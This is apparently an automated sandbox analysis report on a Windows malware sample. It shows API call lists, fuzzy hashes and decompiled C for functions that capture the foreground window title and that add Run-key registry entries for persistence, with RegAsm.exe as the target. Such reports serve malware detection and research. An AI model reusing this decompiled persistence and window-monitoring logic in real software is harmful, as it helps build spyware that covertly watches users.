                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?), ref: 00405963
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405974
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040597F
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,0041B310), ref: 00405994
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V10@0@V?$basic_string@$?c_str@?$basic_string@D@1@@$?data@?$basic_string@?length@?$basic_string@G@2@@std@@G@std@@V01@@$?empty@?$basic_string@CreateFileconnect
                                  • String ID:
                                  • API String ID: 257471410-0
                                  • Opcode ID: 83dcd43653f5a46f8ce17e076b78250aa34a7d21deb8e598d0ab0f6f50af779d
                                  • Instruction ID: a7298ed754ce3842782531f55b1250d517e56450e3269786ed83483861d592cb
                                  • Opcode Fuzzy Hash: 83dcd43653f5a46f8ce17e076b78250aa34a7d21deb8e598d0ab0f6f50af779d
                                  • Instruction Fuzzy Hash: 034152B2D00508ABCB05FBA1ED5A9EE7738DF54304B10407AE912B71D2EB795F48CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412F73, Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 30%
                                  			E00412F73(char _a4, void* _a20) {
				char _v5;
				void* _v24;
				char _v40;
				int _t26;
				int _t29;
				void* _t37;
				unsigned int _t66;
				signed int _t67;
				int _t70;
				signed short _t73;
				struct HWND__* _t81;
				void* _t83;

				_t81 = GetForegroundWindow();
				_t26 = GetWindowTextLengthA(_t81);
				_t89 = _t26;
				if(_t26 <= 0) {
					L6:
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return 0;
				}
				_t28 = _t26 + 1;
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z( &_v5);
				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t29 = GetWindowTextA(_t81, _t26 + 1, _t26 + 1);
				__imp__?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ();
				__imp__?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ();
				__imp__?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ();
				E00413A29(_t29, _t29, _t29, __imp__tolower);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E004129EB(_t89,  &_v40,  &_a4, 0x415b80,  &_v5, _t28, 0);
				_t73 = 0;
				if(E00401838( &_v40) <= 0) {
					L5:
					E004017DD( &_v40);
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					goto L6;
				}
				_t82 = 0;
				while(1) {
					_t37 = E0040180C( &_v40, 0, _t82);
					__imp__?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z(_t37, 0);
					if(_t37 !=  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
						break;
					}
					_t73 = _t73 + 1;
					_t82 = _t73 & 0x0000ffff;
					if((_t73 & 0x0000ffff) < E00401838( &_v40)) {
						continue;
					}
					goto L5;
				}
				__eflags = _a20;
				if(_a20 != 0) {
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					asm("repne scasb");
					_t66 =  !( &_v24 | 0xffffffff);
					_t83 = _t37 - _t66;
					_t67 = _t66 >> 2;
					_t70 = memcpy(_a20, _t83, _t67 << 2) & 0x00000003;
					__eflags = _t70;
					memcpy(_t83 + _t67 + _t67, _t83, _t70);
				}
				E004017DD( &_v40);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 1;
			}















                                  0x00412f81
                                  0x00412f84
                                  0x00412f8a
                                  0x00412f8c
                                  0x00413063
                                  0x00413066
                                  0x00000000
                                  0x0041306c
                                  0x00412f95
                                  0x00412f9d
                                  0x00412fa6
                                  0x00412fb0
                                  0x00412fb8
                                  0x00412fc7
                                  0x00412fd1
                                  0x00412fdb
                                  0x00412fe2
                                  0x00412ff2
                                  0x00413001
                                  0x0041300b
                                  0x00413016
                                  0x0041301f
                                  0x00413052
                                  0x00413055
                                  0x0041305d
                                  0x00000000
                                  0x0041305d
                                  0x00413021
                                  0x00413023
                                  0x00413029
                                  0x00413032
                                  0x00413040
                                  0x00000000
                                  0x00000000
                                  0x00413042
                                  0x00413046
                                  0x00413050
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00413050
                                  0x00413072
                                  0x00413076
                                  0x0041307b
                                  0x00413088
                                  0x0041308a
                                  0x00413090
                                  0x00413095
                                  0x0041309c
                                  0x0041309c
                                  0x0041309f
                                  0x0041309f
                                  0x004130a4
                                  0x004130ac
                                  0x004130b5
                                  0x00000000

                                  APIs
                                  • GetForegroundWindow.USER32(?,0041BCB0,?,?,?,?,?,?,?,?,0040542E), ref: 00412F7B
                                  • GetWindowTextLengthA.USER32(00000000), ref: 00412F84
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,0040542E), ref: 00412F9D
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00412FA6
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FB0
                                  • GetWindowTextA.USER32 ref: 00412FB8
                                  • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00412FC7
                                  • ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FD1
                                  • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FDB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B80,?,00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FF2
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040542E), ref: 00413001
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(00000000,00000000,00000000), ref: 00413032
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041305D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00413066
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0041307B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004130AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004130B5
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@$D@1@@V12@Window$?begin@?$basic_string@?c_str@?$basic_string@?find@?$basic_string@TextV01@@$??4?$basic_string@?end@?$basic_string@?substr@?$basic_string@ForegroundLengthV01@
                                  • String ID:
                                  • API String ID: 3496238640-0
                                  • Opcode ID: 4cce06ad55edbceb2eb1acd16d276c83b26923f47a7b414541e37ea5d0900f90
                                  • Instruction ID: d45ca6ef39ea3e178db3ab1d94ac08b999b831b850f622e5a8fdf4a981eaba08
                                  • Opcode Fuzzy Hash: 4cce06ad55edbceb2eb1acd16d276c83b26923f47a7b414541e37ea5d0900f90
                                  • Instruction Fuzzy Hash: 02414E32500509DBCB04EFA1DD5A9EE7BB8EF94342B10416AF803A31A0EF745F45CA69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004053DA, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 85sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00405423
                                    • Part of subcall function 00412F73: GetForegroundWindow.USER32(?,0041BCB0,?,?,?,?,?,?,?,?,0040542E), ref: 00412F7B
                                    • Part of subcall function 00412F73: GetWindowTextLengthA.USER32(00000000), ref: 00412F84
                                    • Part of subcall function 00412F73: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,0040542E), ref: 00412F9D
                                    • Part of subcall function 00412F73: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00412FA6
                                    • Part of subcall function 00412F73: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FB0
                                    • Part of subcall function 00412F73: GetWindowTextA.USER32 ref: 00412FB8
                                    • Part of subcall function 00412F73: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00412FC7
                                    • Part of subcall function 00412F73: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FD1
                                    • Part of subcall function 00412F73: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FDB
                                    • Part of subcall function 00412F73: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B80,?,00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FF2
                                    • Part of subcall function 00412F73: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040542E), ref: 00413001
                                    • Part of subcall function 00412F73: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(00000000,00000000,00000000), ref: 00413032
                                    • Part of subcall function 00412F73: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041305D
                                    • Part of subcall function 00412F73: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00413066
                                  • Sleep.KERNEL32(000001F4), ref: 0040543A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?, ]), ref: 00405451
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[ ,00000000), ref: 00405461
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040546E
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040547D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405486
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040548F
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405498
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004054A7
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 004054C5
                                  • Sleep.KERNEL32(00000064), ref: 004054D9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@V01@@$D@1@@Window$?begin@?$basic_string@D@2@@0@Hstd@@SleepTextV?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?end@?$basic_string@?find@?$basic_string@?length@?$basic_string@ForegroundG@2@@std@@G@std@@LengthV01@V10@V10@@V12@
                                  • String ID: [ $ ]
                                  • API String ID: 3011177377-93608704
                                  • Opcode ID: b17b501f1748e2fb1ab18a7c3d85fa49411d46d8c8bbb0057a51120c035d8143
                                  • Instruction ID: b52ba732bfb27aa553af63110ce50c569faff7b52b45cf0ea854f8293cee1314
                                  • Opcode Fuzzy Hash: b17b501f1748e2fb1ab18a7c3d85fa49411d46d8c8bbb0057a51120c035d8143
                                  • Instruction Fuzzy Hash: A9219571A00508BBCB00B7A4DC5ABEF7B78EF44344F004176F602A3192DF7455898B9D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403744, Relevance: 24.1, APIs: 16, Instructions: 67stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,0041B310), ref: 00403752
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403FC8), ref: 0040375B
                                  • GetDriveTypeA.KERNEL32(00000000,?,0000000A), ref: 00403773
                                  • _itoa.MSVCRT ref: 0040377A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,0000002D), ref: 00403790
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00403798
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00000000), ref: 004037A7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 004037B4
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004037C0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004037C9
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004037D2
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004037DB
                                  • lstrlenA.KERNEL32(00000000), ref: 004037E2
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004037F8
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403FC8), ref: 00403801
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403FC8), ref: 0040380A
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@D@2@@0@Hstd@@V01@@V10@V?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?data@?$basic_string@DriveTypeV01@_itoalstrlen
                                  • String ID:
                                  • API String ID: 3966177967-0
                                  • Opcode ID: 2ed17a773f70f2a2b96c76149902b1bc02ebe8e478459ea86c20583d4a86547d
                                  • Instruction ID: 4300f458e19456516dd56dc641f8d1b829b254aea369022c8032761b79b8ee60
                                  • Opcode Fuzzy Hash: 2ed17a773f70f2a2b96c76149902b1bc02ebe8e478459ea86c20583d4a86547d
                                  • Instruction Fuzzy Hash: B721ADB580060DEBCB05EBE0ED5DDDE777CAF54346B108025F912A3160EB746B49CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407D53, Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 82COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E00407D53(void* __ecx, char _a4, char _a8, char _a12, char _a16) {
				char _v20;
				void* _t13;
				void* _t15;
				char* _t26;
				void* _t27;
				void* _t32;
				void* _t35;

				_t26 = "\"";
				if(_a4 == 1) {
					_t35 = _t27 - 0x10;
					L0041416A();
					L00414146();
					_t3 =  &_a16; // 0x415a24
					_t13 = E0040B7B9(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",  *_t3, _t35,  &_v20,  &_v20, _t26, 0x41ba28);
					_t27 = _t35 + 0x38;
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);
				}
				if(_a8 == 1) {
					_t32 = _t27 - 0x10;
					L0041416A();
					L00414146();
					_t7 =  &_a16; // 0x415a24
					_t13 = E0040B7B9(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",  *_t7, _t32,  &_v20,  &_v20, _t26, 0x41ba28);
					_t27 = _t32 + 0x38;
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);
				}
				if(_a12 == 1) {
					L0041416A();
					L00414146();
					_t15 = E0040B7B9(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _a16, _t27 - 0x10,  &_v20,  &_v20, _t26, 0x41ba28);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);
					return _t15;
				}
				return _t13;
			}










                                  0x00407d60
                                  0x00407d6a
                                  0x00407d71
                                  0x00407d7a
                                  0x00407d84
                                  0x00407d8c
                                  0x00407d99
                                  0x00407d9e
                                  0x00407da4
                                  0x00407da4
                                  0x00407dae
                                  0x00407db5
                                  0x00407dbe
                                  0x00407dc8
                                  0x00407dd0
                                  0x00407ddd
                                  0x00407de2
                                  0x00407de8
                                  0x00407de8
                                  0x00407df2
                                  0x00407e02
                                  0x00407e0c
                                  0x00407e21
                                  0x00407e2c
                                  0x00000000
                                  0x00407e2c
                                  0x00407e36

                                  APIs
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28,00415A24,?,00408003), ref: 00407D7A
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 00407DA4
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28,00415A24,?,00408003), ref: 00407D84
                                    • Part of subcall function 0040B7B9: RegCreateKeyW.ADVAPI32(?,80000002,80000002), ref: 0040B7C6
                                    • Part of subcall function 0040B7B9: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00415628,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28), ref: 0040B7D5
                                    • Part of subcall function 0040B7B9: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28), ref: 0040B7E3
                                    • Part of subcall function 0040B7B9: RegSetValueExW.ADVAPI32(80000002,00407E26,00000000,?,00000000,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24), ref: 0040B7F6
                                    • Part of subcall function 0040B7B9: RegCloseKey.ADVAPI32(80000002,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28), ref: 0040B801
                                    • Part of subcall function 0040B7B9: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28,00415A24), ref: 0040B810
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28,00415A24), ref: 00407DBE
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28,00415A24), ref: 00407DC8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 00407DE8
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(00000001,00415628,0041BA28,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28,00415A24), ref: 00407E02
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28,00415A24), ref: 00407E0C
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 00407E2C
                                  Strings
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 00407D5F
                                  • Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00407D8F, 00407DD3
                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00407E17
                                  • $ZA, xrefs: 00407DD0, 00407D8C
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: G@std@@U?$char_traits@V?$allocator@$G@2@@0@G@2@@std@@Hstd@@V?$basic_string@$??1?$basic_string@$V10@V10@@$?c_str@?$basic_string@?length@?$basic_string@CloseCreateValue
                                  • String ID: $ZA$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\
                                  • API String ID: 111787555-3388917883
                                  • Opcode ID: e235326932527ed2226d8983e4f804bb91d78ac99fb475050114bcfa4d032180
                                  • Instruction ID: d86c43b3a5ba32eb059a2cdc2ec90b1b4ffa6c8f934f2ed61d0225c93748e370
                                  • Opcode Fuzzy Hash: e235326932527ed2226d8983e4f804bb91d78ac99fb475050114bcfa4d032180
                                  • Instruction Fuzzy Hash: EE215A72D00114BBD710BAA69C4AEFB7F2CDF91354F440429F91962182E6BA8994C7E6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00413C3F, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 71windowCOMMON
